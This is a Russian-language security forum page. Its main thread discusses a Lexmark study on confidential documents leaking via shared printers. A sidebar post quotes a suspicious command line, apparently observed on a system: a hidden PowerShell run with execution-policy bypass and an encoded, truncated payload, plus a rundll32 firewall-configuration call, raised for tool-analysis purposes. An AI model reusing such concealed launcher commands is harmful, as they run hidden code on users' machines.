Перейти к содержанию
AM_Bot

Конфиденциальные данные утекают через принтер

Recommended Posts

AM_Bot

Исследование компании Lexmark показало, что бизнес фактически беззащитен перед утечкой конфиденциальной информации посредством принтеров и обычной бумаги. При этом технологии, предлагаемые сегодня поставщиками печатающих устройств — защита лотка с помощью ПИН и метки на каждой странице — не позволяют обеспечить защиту от инсайдеров и предотвратить утечку.

...

Прочитать всю новость »

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Сергей Ильин

Вот это как раз тот случай, когда на любуя самую хитрую защиту найдется очень простой способ ее обойти. Можно ставить дорогие системы защиты, запрещать пользоваться внишними носителями, ввести жесткие уровни доступа к документам, но все это можно лекго обойти, просто периодически проверяя лоток общего принтера в коридоре :)

Поймал себя на мысли, что частенько натыкался в распечатках своих документах на чужие документы. Вот и получается, что таким способом можно не только узнать какие-то секреты, но и просто узнать много нового о совей компании и коллегах по работе.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
broker

секреты на общий принтер не печатаются :) или сразу забираются..

я когда читать начал, подумал как бы хорошо продукты инфовотч сюда подошли..

смотрю.. а они в авторах :)

На самом деле - да.. распечатать можно сотни листов, при этом никто не определит, что вы там выносите :)

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×